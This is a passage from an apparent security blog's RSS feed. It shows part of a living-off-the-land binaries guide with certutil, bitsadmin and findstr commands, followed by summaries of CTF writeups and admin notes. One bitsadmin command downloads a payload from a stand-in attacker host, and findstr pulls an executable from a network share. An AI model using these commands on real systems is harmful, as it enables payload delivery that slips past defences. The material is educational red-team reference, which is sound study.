locally:&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;n&#34;&gt;certutil&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;-encode&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;payload&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;.&lt;/span&gt;&lt;span class=&#34;py&#34;&gt;exe&lt;/span&gt; &lt;span class=&#34;nb&#34;&gt;Encoded-payload&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;.&lt;/span&gt;&lt;span class=&#34;py&#34;&gt;txt&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;#2: BITSadmin&lt;/p&gt;&#xA;&lt;p&gt;&lt;em&gt;Download, execute, copy, ADS&lt;/em&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin&#34;&gt;bitsadmin&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/&#34;&gt;bitsadmin | LOLBAS&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://attack.mitre.org/techniques/T1197/&#34;&gt;https://attack.mitre.org/techniques/T1197/&lt;/a&gt;&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-powershell&#34; data-lang=&#34;powershell&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;n&#34;&gt;bitsadmin&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;.&lt;/span&gt;&lt;span class=&#34;py&#34;&gt;exe&lt;/span&gt; &lt;span class=&#34;p&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;transfer&lt;/span&gt; &lt;span class=&#34;p&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;Download&lt;/span&gt; &lt;span class=&#34;p&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;priority&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;Foreground&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;http&lt;/span&gt;&lt;span class=&#34;err&#34;&gt;:&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;//&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;Attacker_IP&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;payload&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;.&lt;/span&gt;&lt;span class=&#34;py&#34;&gt;exe&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;c:&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;\&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;Users&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;\&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;thm&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;\&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;Desktop&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;\&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;payload&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;.&lt;/span&gt;&lt;span class=&#34;py&#34;&gt;exe&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;#3: Findstr&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/findstr&#34;&gt;findstr&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://lolbas-project.github.io/lolbas/Binaries/Findstr/&#34;&gt;findstr | LOLBAS&lt;/a&gt;&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-powershell&#34; data-lang=&#34;powershell&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c&#34;&gt;# Download from SMB SHared folders on the same Network&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;n&#34;&gt;findstr&lt;/span&gt; &lt;span class=&#34;p&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;V&lt;/span&gt; &lt;span class=&#34;p&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;L&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;W3AllLov3LolBas&lt;/span&gt; &lt;span class=&#34;p&#34;&gt;\\&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;webdavserver&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;\&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;folder&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;\&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;file&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;.&lt;/span&gt;&lt;span class=&#34;py&#34;&gt;exe&lt;/span&gt; &lt;span class=&#34;p&#34;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;c:&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;\&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;ADS&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;\&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;file&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;.&lt;/span&gt;&lt;span class=&#34;py&#34;&gt;exe&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h1 id=&#34;file-execution&#34;&gt;File Execution&lt;/h1&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://attack.mitre.org/techniques/T1218/&#34;&gt;&lt;strong&gt;Signed Binary Proxy Execution&lt;/strong&gt;&lt;/a&gt; or &lt;a href=&#34;https://attack.mitre.org/techniques/T1202/&#34;&gt;**Indirect Command Execution&lt;/a&gt;: Leveraging other programs to execute malicious programs.**&lt;/p&gt;</description>
    </item>
    <item>
      <title>CTF Writeup - Brainpan</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2022/ctf-writeup-brainpan/ctf-writeup-brainpan/</link>
      <pubDate>Fri, 01 Apr 2022 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2022/ctf-writeup-brainpan/ctf-writeup-brainpan/</guid>
      <description>&lt;p&gt;Tryhackme writeup: Brainpan&amp;quot;&#xA;Brainpan is part of the &amp;ldquo;Offensive Pentesting Path&amp;rdquo; in TryHackMe, and it is a straight-forward &lt;strong&gt;buffer overflow&lt;/strong&gt; activity with further extra steps to achieve full &lt;strong&gt;privilege escalation&lt;/strong&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Linux User switching with their own password</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2021/linux-su-own-password/</link>
      <pubDate>Thu, 23 Sep 2021 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2021/linux-su-own-password/</guid>
      <description>&lt;p&gt;A procedure to allow users to switch (su) to another user, using their own password instead of the &amp;ldquo;target&amp;rdquo; user password&lt;/p&gt;</description>
    </item>
    <item>
      <title>Running NetworkMiner on Linux</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2021/networkminer-pcap/</link>
      <pubDate>Tue, 10 Aug 2021 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2021/networkminer-pcap/</guid>
      <description>&lt;p&gt;Using Mono utility to run NetworkMiner, a Windows utility for PCAP analysis&lt;/p&gt;</description>
    </item>
    <item>
      <title>CTF Writeup - Alienphish Challenge</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2021/ctf-writeup-alienphish-challenge/ctf-writeup-alienphish-challenge/</link>
      <pubDate>Mon, 26 Apr 2021 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2021/ctf-writeup-alienphish-challenge/ctf-writeup-alienphish-challenge/</guid>
      <description>&lt;p&gt;This CTF was part of the event hosted at ctf.hackthebox.eu “Cyberapocalypse”. Mission: Find a payload and a flag inside “Alien Weaknesses.pptx”&lt;/p&gt;</description>
    </item>
  </channel>
</rss>
